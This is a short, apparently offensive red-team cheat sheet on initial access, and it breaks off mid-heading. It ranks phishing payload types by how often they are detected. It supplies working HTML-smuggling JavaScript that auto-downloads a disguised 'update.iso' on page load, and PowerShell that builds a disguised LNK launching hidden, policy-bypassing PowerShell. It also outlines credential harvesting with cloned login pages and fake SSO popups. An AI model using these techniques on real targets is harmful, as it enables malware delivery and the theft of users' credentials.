initial-accesslisted

# Initial Access ## Phishing — Email ### Payload types (in order of detection likelihood) ``` 1. Macro-enabled Office documents (.xlsm, .docm) — high detection 2. ISO/IMG containers (bypass Mark-of-the-Web) — medium detection 3. HTML smuggling — medium detection 4. LNK files — medium detection 5. PDF with embedded link — lower detection 6. QR code phishing (to mobile) — lowest detection ``` ### HTML Smuggling Deliver payload via JavaScript blob — bypasses email gateways that don't execute JS: ```html <script> function d() { var data = atob("[BASE64_PAYLOAD]"); var blob = new Blob([data], {type: 'application/octet-stream'}); var url = window.URL.createObjectURL(blob); var a = document.createElement('a'); a.href = url; a.download = 'update.iso'; a.click(); } </script> <body onload="d()"> ``` ### LNK Payload ```powershell # Create malicious LNK $lnk = (New-Object -ComObject WScript.Shell).CreateShortcut("$env:TEMP\Update.lnk") $lnk.TargetPath = "C:\Windows\System32\cmd.exe" $lnk.Arguments = "/c powershell -w hidden -ep bypass -c [payload]" $lnk.IconLocation = "C:\Windows\System32\shell32.dll,3" $lnk.Save() ``` ## Phishing — Web (Drive-by) ``` Credential harvesting site: 1. Clone target's login page (SET / evilginx2) 2. Send link via spearphishing 3. Harvest credentials in real time Browser-in-the-Browser (BitB): 1. Overlay a fake browser popup simulating SSO login 2. Capture credentials before they reach the real SSO provider ``` ## Wateri